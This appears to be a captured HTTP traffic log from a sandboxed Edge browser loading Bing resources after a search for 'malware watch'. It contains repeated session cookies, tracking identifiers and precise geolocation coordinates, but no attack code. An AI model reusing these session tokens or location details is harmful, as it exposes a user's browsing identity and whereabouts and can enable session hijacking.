sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130
cookie: SRCHHPGUSR=SRCHLANG=en
cookie: bm_sv=BA2C011CC84F794D64B638ABD94B04AE~YAAQMjZ6XChFd5OUAQAAI989uRp27uVDwDEWs7ccxGdwFgQbqAqBFduxjzrsIah2lgrS2+e5RYmPS2FWltvv9QsAunj5PawZK/JTwp76h5kGnemVo8xIbfmktU9+2ojyIUcaho2D3zkqJzs4lrSDDX0JwklKbR6eHwEb9DrLbi483wi3NGottLXsD/8bU4G+mG5f/uS1dKobC0IUkFNoQ80mOWi4BfDGS7geido1g3UAn/J7YIasFx7XfVPPRw==~1
ResponseHTTP/2.0 200
access-control-allow-origin: *
cache-control: public, max-age=21600
content-encoding: br
last-modified: Wed, 29 Jan 2025 03:32:58 GMT
vary: Accept-Encoding
x-ms-request-id: f50b6278-101e-0046-47ec-72530c000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
x-azure-ref: 20250130T080000Z-15c498d86c5q8mqlhC1DB1augn0000000ma0000000006a77
x-fd-int-roxy-purgeid: 82974704
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
x-ceto-ref: 679b3180c6dc46f3bc29002b781a6fab|AFD:679b3180c6dc46f3bc29002b781a6fab|2025-01-30T08:00:00.696Z
content-length: 50027
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274628.1ad0f2f3
-
Remote address:88.221.135.16:443RequestGET /rp/xGePBp3s5WxAfPJ_KcDfn09Itck.br.js HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
dnt: 1
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130
cookie: SRCHHPGUSR=SRCHLANG=en
cookie: bm_sv=BA2C011CC84F794D64B638ABD94B04AE~YAAQMjZ6XChFd5OUAQAAI989uRp27uVDwDEWs7ccxGdwFgQbqAqBFduxjzrsIah2lgrS2+e5RYmPS2FWltvv9QsAunj5PawZK/JTwp76h5kGnemVo8xIbfmktU9+2ojyIUcaho2D3zkqJzs4lrSDDX0JwklKbR6eHwEb9DrLbi483wi3NGottLXsD/8bU4G+mG5f/uS1dKobC0IUkFNoQ80mOWi4BfDGS7geido1g3UAn/J7YIasFx7XfVPPRw==~1
ResponseHTTP/2.0 200
etag: 0x8DCDC608780CE8B
content-length: 512
content-type: image/svg+xml
content-md5: G0HPjgI1nZPfetni3YDkOw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f5f97b5b-c01e-002e-02f1-176a57000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=262345
expires: Sun, 02 Feb 2025 22:56:13 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.32367a5c.1738274628.1ad0f3a4
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
GEThttps://www.bing.com/rewardsapp/widgetassets/prod/medallion/1.4.3/js/widget.js?t=250130msedge.exeRemote address:88.221.135.16:443RequestGET /rewardsapp/widgetassets/prod/medallion/1.4.3/js/widget.js?t=250130 HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.bing.com/search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130
cookie: SRCHHPGUSR=SRCHLANG=en
cookie: bm_sv=BA2C011CC84F794D64B638ABD94B04AE~YAAQMjZ6XChFd5OUAQAAI989uRp27uVDwDEWs7ccxGdwFgQbqAqBFduxjzrsIah2lgrS2+e5RYmPS2FWltvv9QsAunj5PawZK/JTwp76h5kGnemVo8xIbfmktU9+2ojyIUcaho2D3zkqJzs4lrSDDX0JwklKbR6eHwEb9DrLbi483wi3NGottLXsD/8bU4G+mG5f/uS1dKobC0IUkFNoQ80mOWi4BfDGS7geido1g3UAn/J7YIasFx7XfVPPRw==~1
ResponseHTTP/2.0 200
etag: 0x8DCDC5E6A2D8636
content-length: 349
content-type: image/svg+xml
content-md5: iRh5eBPrKqjGuvgWi/nStw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b848dd36-301e-003b-4f2a-16a8ce000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=141784
expires: Sat, 01 Feb 2025 13:26:52 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.32367a5c.1738274628.1ad0f3a5
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.16:443RequestGET /rp/em88jYr3ZOv7yX3AqoOU5z8EEnA.png HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130
cookie: bm_sv=BA2C011CC84F794D64B638ABD94B04AE~YAAQMjZ6XChFd5OUAQAAI989uRp27uVDwDEWs7ccxGdwFgQbqAqBFduxjzrsIah2lgrS2+e5RYmPS2FWltvv9QsAunj5PawZK/JTwp76h5kGnemVo8xIbfmktU9+2ojyIUcaho2D3zkqJzs4lrSDDX0JwklKbR6eHwEb9DrLbi483wi3NGottLXsD/8bU4G+mG5f/uS1dKobC0IUkFNoQ80mOWi4BfDGS7geido1g3UAn/J7YIasFx7XfVPPRw==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1822
cache-control: public, max-age=1288917
date: Thu, 30 Jan 2025 22:03:48 GMT
x-cache: TCP_HIT from a92-122-54-50.deploy.akamaitechnologies.com (AkamaiGHost/11.8.1-4626758e7fa58b73aefa05b51f5ad43e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.32367a5c.1738274628.1ad0f3a7
x-check-cacheable: YES
-
GEThttps://www.bing.com/geolocation/write?isDevLoc=false&lat=51.519901275634766&lon=-0.10880059748888016&dispName=London%252C%2520Greater%2520London&isEff=1&effLocType=1&clientsid=05DFC6CDCE37668C2381D349CFAB67A5msedge.exeRemote address:88.221.135.16:443RequestGET /geolocation/write?isDevLoc=false&lat=51.519901275634766&lon=-0.10880059748888016&dispName=London%252C%2520Greater%2520London&isEff=1&effLocType=1&clientsid=05DFC6CDCE37668C2381D349CFAB67A5 HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130
cookie: bm_sv=BA2C011CC84F794D64B638ABD94B04AE~YAAQMjZ6XChFd5OUAQAAI989uRp27uVDwDEWs7ccxGdwFgQbqAqBFduxjzrsIah2lgrS2+e5RYmPS2FWltvv9QsAunj5PawZK/JTwp76h5kGnemVo8xIbfmktU9+2ojyIUcaho2D3zkqJzs4lrSDDX0JwklKbR6eHwEb9DrLbi483wi3NGottLXsD/8bU4G+mG5f/uS1dKobC0IUkFNoQ80mOWi4BfDGS7geido1g3UAn/J7YIasFx7XfVPPRw==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1753
x-check-cacheable: YES
cache-control: public, max-age=2580154
date: Thu, 30 Jan 2025 22:03:48 GMT
x-cache: TCP_MISS from a92-122-54-50.deploy.akamaitechnologies.com (AkamaiGHost/11.8.1-4626758e7fa58b73aefa05b51f5ad43e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.32367a5c.1738274628.1ad0f3a6
-
GEThttps://www.bing.com/fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1738274627087%2C%22Name%22%3A%22Base%22%2C%22FID%22%3A%22CI%22%7D%2C%7B%22Rtt%22%3A%22100%22%2C%22Downlink%22%3A%221.5%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.NetworkPerformance%22%2C%22TS%22%3A1738274627087%2C%22Name%22%3A%22timinginfo%22%2C%22FID%22%3A%22NetworkPerformanceDetails%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274627099%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22EdgeSpoofing%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274627100%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DM%22%7D%5Dmsedge.exeRemote address:88.221.135.16:443RequestGET /fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1738274627087%2C%22Name%22%3A%22Base%22%2C%22FID%22%3A%22CI%22%7D%2C%7B%22Rtt%22%3A%22100%22%2C%22Downlink%22%3A%221.5%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.NetworkPerformance%22%2C%22TS%22%3A1738274627087%2C%22Name%22%3A%22timinginfo%22%2C%22FID%22%3A%22NetworkPerformanceDetails%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274627099%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22EdgeSpoofing%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274627100%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DM%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130
cookie: bm_sv=BA2C011CC84F794D64B638ABD94B04AE~YAAQMjZ6XChFd5OUAQAAI989uRp27uVDwDEWs7ccxGdwFgQbqAqBFduxjzrsIah2lgrS2+e5RYmPS2FWltvv9QsAunj5PawZK/JTwp76h5kGnemVo8xIbfmktU9+2ojyIUcaho2D3zkqJzs4lrSDDX0JwklKbR6eHwEb9DrLbi483wi3NGottLXsD/8bU4G+mG5f/uS1dKobC0IUkFNoQ80mOWi4BfDGS7geido1g3UAn/J7YIasFx7XfVPPRw==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1753
x-check-cacheable: YES
cache-control: public, max-age=1088051
date: Thu, 30 Jan 2025 22:03:48 GMT
x-cache: TCP_MISS from a92-122-54-50.deploy.akamaitechnologies.com (AkamaiGHost/11.8.1-4626758e7fa58b73aefa05b51f5ad43e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.32367a5c.1738274628.1ad0f3ab
-
GEThttps://www.bing.com/fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274627101%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DARKMODE%22%7D%5Dmsedge.exeRemote address:88.221.135.16:443RequestGET /fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274627101%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DARKMODE%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130
cookie: bm_sv=BA2C011CC84F794D64B638ABD94B04AE~YAAQMjZ6XChFd5OUAQAAI989uRp27uVDwDEWs7ccxGdwFgQbqAqBFduxjzrsIah2lgrS2+e5RYmPS2FWltvv9QsAunj5PawZK/JTwp76h5kGnemVo8xIbfmktU9+2ojyIUcaho2D3zkqJzs4lrSDDX0JwklKbR6eHwEb9DrLbi483wi3NGottLXsD/8bU4G+mG5f/uS1dKobC0IUkFNoQ80mOWi4BfDGS7geido1g3UAn/J7YIasFx7XfVPPRw==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274628.1ad0f39f
-
